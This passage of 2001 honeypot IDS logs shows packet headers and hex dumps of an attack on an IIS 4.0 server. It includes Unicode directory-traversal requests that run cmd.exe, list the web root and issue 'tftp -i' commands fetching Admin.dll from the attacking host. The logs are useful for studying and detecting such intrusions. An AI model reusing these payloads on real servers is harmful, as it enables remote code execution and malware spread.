000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72 HTTP/1.1 500 Ser
010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65 ver Error..Serve
020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53 r: Microsoft-IIS
030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C /4.0..Date: Tue,
040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A 18 Sep 2001 16:
050 : 30 34 3A 31 35 20 47 4D 54 0D 0A 43 6F 6E 74 65 04:15 GMT..Conte
060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 nt-Type: text/ht
070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 ml..Content-Leng
080 : 74 68 3A 20 31 30 30 0D 0A 0D 0A 3C 68 74 6D 6C th: 100....<html
090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72
><head><title>Er
0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61
ror</title></hea
0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 73 70 65 63 d><body>The
spec
0c0 : 69 66 69 65 64 20 6D 6F 64 75 6C 65 20 63 6F 75 ified module cou
0d0 : 6C 64 20 6E 6F 74 20 62 65 20 66 6F 75 6E 64 2E ld not be found.
0e0 : 20 3C 2F 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
</body></html>
----------------------------------------------------------------------------
--
#(2 - 25389) [2001-09-18 10:20:34] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=26372 flags=0 offset=0 TTL=128 chksum=58006
TCP: port=80 -> dport: 2154 flags=***A***F seq=486539
ack=478595622 off=5 res=0 win=8684 urp=0 chksum=32953
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25390) [2001-09-18 10:20:34] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=10559 flags=0 offset=0 TTL=118 chksum=10844
TCP: port=2154 -> dport: 80 flags=*****R** seq=478595622
ack=0 off=5 res=0 win=0 urp=0 chksum=3909
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25391) [2001-09-18 10:20:34] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=10815 flags=0 offset=0 TTL=118 chksum=10584
TCP: port=2248 -> dport: 80 flags=******S* seq=478596387
ack=0 off=6 res=0 win=8192 urp=0 chksum=54319
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25392) [2001-09-18 10:20:34] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=27396 flags=0 offset=0 TTL=128 chksum=56978
TCP: port=80 -> dport: 2248 flags=***A**S* seq=487511
ack=478596388 off=6 res=0 win=8760 urp=0 chksum=24968
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25393) [2001-09-18 10:20:34] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=11327 flags=0 offset=0 TTL=118 chksum=26460
TCP: port=2154 -> dport: 80 flags=*****R** seq=478595622
ack=478595622 off=5 res=0 win=0 urp=0 chksum=10392
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25394) [2001-09-18 10:20:35] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=9536 flags=0 offset=0 TTL=119 chksum=11611
TCP: port=2248 -> dport: 80 flags=***A**** seq=478596388
ack=487512 off=5 res=0 win=8760 urp=0 chksum=31045
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25395) [2001-09-18 10:20:38] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=157 ID=21314 flags=0 offset=0 TTL=119 chksum=65251
TCP: port=2248 -> dport: 80 flags=***AP*** seq=478596388
ack=487512 off=5 res=0 win=8760 urp=0 chksum=30371
Payload: length = 111
000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1
050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C
060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo
----------------------------------------------------------------------------
--
#(2 - 25396) [2001-09-18 10:20:38] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=231 ID=30212 flags=0 offset=0 TTL=128 chksum=53975
TCP: port=80 -> dport: 2248 flags=***AP*** seq=487512
ack=478596505 off=5 res=0 win=8643 urp=0 chksum=9103
Payload: length = 191
000 : 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK.
010 : 0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F .Server: Microso
020 : 66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 ft-IIS/4.0..Date
030 : 3A 20 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 : Tue, 18 Sep 20
040 : 30 31 20 31 36 3A 30 34 3A 31 38 20 47 4D 54 0D 01 16:04:18 GMT.
050 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 .Content-Type: a
060 : 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74 pplication/octet
070 : 2D 73 74 72 65 61 6D 0D 0A 56 6F 6C 75 6D 65 20 -stream..Volume
080 : 69 6E 20 64 72 69 76 65 20 43 20 68 61 73 20 6E in drive C has n
090 : 6F 20 6C 61 62 65 6C 2E 0D 0A 56 6F 6C 75 6D 65 o label...Volume
0a0 : 20 53 65 72 69 61 6C 20 4E 75 6D 62 65 72 20 69 Serial Number i
0b0 : 73 20 38 30 42 34 2D 38 39 43 41 0D 0A 0D 0A s 80B4-89CA....
----------------------------------------------------------------------------
--
#(2 - 25397) [2001-09-18 10:20:38] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=564 ID=30468 flags=0 offset=0 TTL=128 chksum=53386
TCP: port=80 -> dport: 2248 flags=***AP**F seq=487703
ack=478596505 off=5 res=0 win=8643 urp=0 chksum=21986
Payload: length = 524
000 : 20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 43 3A Directory of C:
010 : 5C 49 6E 65 74 70 75 62 5C 77 77 77 72 6F 6F 74 \Inetpub\wwwroot
020 : 0D 0A 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 30 ....09/18/01 10
030 : 3A 35 34 61 20 20 20 20 20 20 20 20 3C 44 49 52 :54a <DIR
040 : 3E 20 20 20 20 20 20 20 20 20 20 2E 0D 0A 30 39 > ...09
050 : 2F 31 38 2F 30 31 20 20 31 30 3A 35 34 61 20 20 /18/01 10:54a
060 : 20 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20 <DIR>
070 : 20 20 20 20 20 2E 2E 0D 0A 30 39 2F 31 38 2F 30 ....09/18/0
080 : 31 20 20 31 30 3A 35 34 61 20 20 20 20 20 20 20 1 10:54a
090 : 20 3C 44 49 52 3E 20 20 20 20 20 20 20 20 20 20 <DIR>
0a0 : 63 67 69 2D 62 69 6E 0D 0A 30 39 2F 31 38 2F 30 cgi-bin..09/18/0
0b0 : 31 20 20 31 30 3A 35 34 61 20 20 20 20 20 20 20 1 10:54a
0c0 : 20 20 20 20 20 20 20 20 20 20 34 2C 36 36 33 20 4,663
0d0 : 64 65 66 61 75 6C 74 2E 61 73 70 0D 0A 30 39 2F default.asp..09/
0e0 : 31 38 2F 30 31 20 20 31 30 3A 35 34 61 20 20 20 18/01 10:54a
0f0 : 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20 20 <DIR>
100 : 20 20 20 20 69 6D 61 67 65 73 0D 0A 30 39 2F 31 images..09/1
110 : 38 2F 30 31 20 20 31 30 3A 35 34 61 20 20 20 20 8/01 10:54a
120 : 20 20 20 20 20 20 20 20 20 20 20 20 20 32 2C 35 2,5
130 : 30 34 20 70 6F 73 74 69 6E 66 6F 2E 68 74 6D 6C 04 postinfo.html
140 : 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 30 3A 35 ..09/18/01 10:5
150 : 34 61 20 20 20 20 20 20 20 20 3C 44 49 52 3E 20 4a
<DIR>
160 : 20 20 20 20 20 20 20 20 20 5F 70 72 69 76 61 74 _privat
170 : 65 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 30 3A e..09/18/01 10:
180 : 35 34 61 20 20 20 20 20 20 20 20 20 20 20 20 20 54a
190 : 20 20 20 20 31 2C 37 35 39 20 5F 76 74 69 5F 69 1,759 _vti_i
1a0 : 6E 66 2E 68 74 6D 6C 0D 0A 20 20 20 20 20 20 20 nf.html..
1b0 : 20 20 20 20 20 20 20 20 38 20 46 69 6C 65 28 73 8 File(s
1c0 : 29 20 20 20 20 20 20 20 20 20 20 38 2C 39 32 36 ) 8,926
1d0 : 20 62 79 74 65 73 0D 0A 20 20 20 20 20 20 20 20 bytes..
1e0 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
1f0 : 20 20 32 2C 31 30 30 2C 38 38 33 2C 34 35 36 20 2,100,883,456
200 : 62 79 74 65 73 20 66 72 65 65 0D 0A bytes free..
----------------------------------------------------------------------------
--
#(2 - 25398) [2001-09-18 10:20:38] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=30274 flags=0 offset=0 TTL=118 chksum=56664
TCP: port=2248 -> dport: 80 flags=*****R** seq=478596505
ack=0 off=5 res=0 win=0 urp=0 chksum=2932
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25399) [2001-09-18 10:20:38] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=30530 flags=0 offset=0 TTL=118 chksum=56404
TCP: port=2610 -> dport: 80 flags=******S* seq=478856437
ack=0 off=6 res=0 win=8192 urp=0 chksum=56047
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25400) [2001-09-18 10:20:38] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=30724 flags=0 offset=0 TTL=128 chksum=53650
TCP: port=80 -> dport: 2610 flags=***A**S* seq=491256
ack=478856438 off=6 res=0 win=8760 urp=0 chksum=22951
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25401) [2001-09-18 10:20:38] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=30786 flags=0 offset=0 TTL=118 chksum=7001
TCP: port=2248 -> dport: 80 flags=*****R** seq=478596505
ack=478596505 off=5 res=0 win=0 urp=0 chksum=8532
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25402) [2001-09-18 10:20:38] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=37442 flags=0 offset=0 TTL=119 chksum=49240
TCP: port=2610 -> dport: 80 flags=***A**** seq=478856438
ack=491257 off=5 res=0 win=8760 urp=0 chksum=29028
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25403) [2001-09-18 10:20:38] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=212 ID=37698 flags=0 offset=0 TTL=119 chksum=48812
TCP: port=2610 -> dport: 80 flags=***AP*** seq=478856438
ack=491257 off=5 res=0 win=8760 urp=0 chksum=13294
Payload: length = 156
000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
040 : 74 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 tftp -i 65.29.24
050 : 33 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 3.180 GET Admin.
060 : 64 6C 6C 20 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C dll c:\Admin.dll
070 : 20 25 32 30 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C %20c:\Admin.dll
080 : 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A HTTP/1.0..Host:
090 : 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 www..Connne
----------------------------------------------------------------------------
--
#(2 - 25404) [2001-09-18 10:20:38] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=395 ID=30980 flags=0 offset=0 TTL=128 chksum=53043
TCP: port=80 -> dport: 2610 flags=***AP*** seq=491257
ack=478856610 off=5 res=0 win=8588 urp=0 chksum=2336
Payload: length = 355
000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16
050 : 3A 30 34 3A 31 39 20 47 4D 54 0D 0A 43 6F 6E 74 :04:19 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E re>
----------------------------------------------------------------------------
--
#(2 - 25405) [2001-09-18 10:20:38] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=31236 flags=0 offset=0 TTL=128 chksum=53142
TCP: port=80 -> dport: 2610 flags=***A***F seq=491612
ack=478856610 off=5 res=0 win=8588 urp=0 chksum=28672
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25406) [2001-09-18 10:20:39] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=46914 flags=0 offset=0 TTL=118 chksum=40024
TCP: port=2610 -> dport: 80 flags=*****R** seq=478856610
ack=0 off=5 res=0 win=0 urp=0 chksum=4605
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25407) [2001-09-18 10:20:39] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=47170 flags=0 offset=0 TTL=118 chksum=39764
TCP: port=2637 -> dport: 80 flags=******S* seq=478856730
ack=0 off=6 res=0 win=8192 urp=0 chksum=55727
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25408) [2001-09-18 10:20:39] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=31492 flags=0 offset=0 TTL=128 chksum=52882
TCP: port=80 -> dport: 2637 flags=***A**S* seq=491757
ack=478856731 off=6 res=0 win=8760 urp=0 chksum=22130
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25409) [2001-09-18 10:20:39] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=47426 flags=0 offset=0 TTL=118 chksum=55896
TCP: port=2610 -> dport: 80 flags=*****R** seq=478856610
ack=478856610 off=5 res=0 win=0 urp=0 chksum=12240
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25410) [2001-09-18 10:20:39] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=59714 flags=0 offset=0 TTL=119 chksum=26968
TCP: port=2637 -> dport: 80 flags=***A**** seq=478856731
ack=491758 off=5 res=0 win=8760 urp=0 chksum=28207
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25411) [2001-09-18 10:20:39] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=212 ID=59970 flags=0 offset=0 TTL=119 chksum=26540
TCP: port=2637 -> dport: 80 flags=***AP*** seq=478856731
ack=491758 off=5 res=0 win=8760 urp=0 chksum=12217
Payload: length = 156
000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
040 : 74 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 tftp -i 65.29.24
050 : 33 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 3.180 GET Admin.
060 : 64 6C 6C 20 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C dll d:\Admin.dll
070 : 20 25 32 30 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C %20d:\Admin.dll
080 : 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A HTTP/1.0..Host:
090 : 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 www..Connne
----------------------------------------------------------------------------
--
#(2 - 25412) [2001-09-18 10:20:39] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=395 ID=31748 flags=0 offset=0 TTL=128 chksum=52275
TCP: port=80 -> dport: 2637 flags=***AP*** seq=491758
ack=478856903 off=5 res=0 win=8588 urp=0 chksum=1268
Payload: length = 355
000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16
050 : 3A 30 34 3A 32 30 20 47 4D 54 0D 0A 43 6F 6E 74 :04:20 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E re>
----------------------------------------------------------------------------
--
#(2 - 25413) [2001-09-18 10:20:39] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=32004 flags=0 offset=0 TTL=128 chksum=52374
TCP: port=80 -> dport: 2637 flags=***A***F seq=492113
ack=478856903 off=5 res=0 win=8588 urp=0 chksum=27851
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25414) [2001-09-18 10:20:40] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=22595 flags=0 offset=0 TTL=118 chksum=64343
TCP: port=2637 -> dport: 80 flags=*****R** seq=478856903
ack=0 off=5 res=0 win=0 urp=0 chksum=4285
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25415) [2001-09-18 10:20:40] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=24131 flags=0 offset=0 TTL=118 chksum=13656
TCP: port=2637 -> dport: 80 flags=*****R** seq=478856903
ack=478856903 off=5 res=0 win=0 urp=0 chksum=11627
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25418) [2001-09-18 10:20:42] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=37445 flags=0 offset=0 TTL=118 chksum=49489
TCP: port=2735 -> dport: 80 flags=******S* seq=478857651
ack=0 off=6 res=0 win=8192 urp=0 chksum=54708
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25419) [2001-09-18 10:20:42] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=34564 flags=0 offset=0 TTL=128 chksum=49810
TCP: port=80 -> dport: 2735 flags=***A**S* seq=495592
ack=478857652 off=6 res=0 win=8760 urp=0 chksum=17276
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25420) [2001-09-18 10:20:43] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=31302 flags=0 offset=0 TTL=119 chksum=55380
TCP: port=2735 -> dport: 80 flags=***A**** seq=478857652
ack=495593 off=5 res=0 win=8760 urp=0 chksum=23353
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25421) [2001-09-18 10:20:43] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=212 ID=31558 flags=0 offset=0 TTL=119 chksum=54952
TCP: port=2735 -> dport: 80 flags=***AP*** seq=478857652
ack=495593 off=5 res=0 win=8760 urp=0 chksum=7107
Payload: length = 156
000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
040 : 74 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 tftp -i 65.29.24
050 : 33 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 3.180 GET Admin.
060 : 64 6C 6C 20 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C dll e:\Admin.dll
070 : 20 25 32 30 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C %20e:\Admin.dll
080 : 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A HTTP/1.0..Host:
090 : 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 www..Connne
----------------------------------------------------------------------------
--
#(2 - 25422) [2001-09-18 10:20:43] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=35076 flags=0 offset=0 TTL=128 chksum=49302
TCP: port=80 -> dport: 2735 flags=***A**** seq=495593
ack=478857824 off=5 res=0 win=8588 urp=0 chksum=23353
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25528) [2001-09-18 10:21:36] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=395 ID=34054 flags=0 offset=0 TTL=128 chksum=49969
TCP: port=80 -> dport: 2735 flags=***AP*** seq=495593
ack=478857824 off=5 res=0 win=8588 urp=0 chksum=61943
Payload: length = 355
000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16
050 : 3A 30 35 3A 31 36 20 47 4D 54 0D 0A 43 6F 6E 74 :05:16 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E re>
----------------------------------------------------------------------------
--
#(2 - 25529) [2001-09-18 10:21:36] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=34310 flags=0 offset=0 TTL=128 chksum=50068
TCP: port=80 -> dport: 2735 flags=***A***F seq=495948
ack=478857824 off=5 res=0 win=8588 urp=0 chksum=22997
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25530) [2001-09-18 10:21:36] Honeypot Data
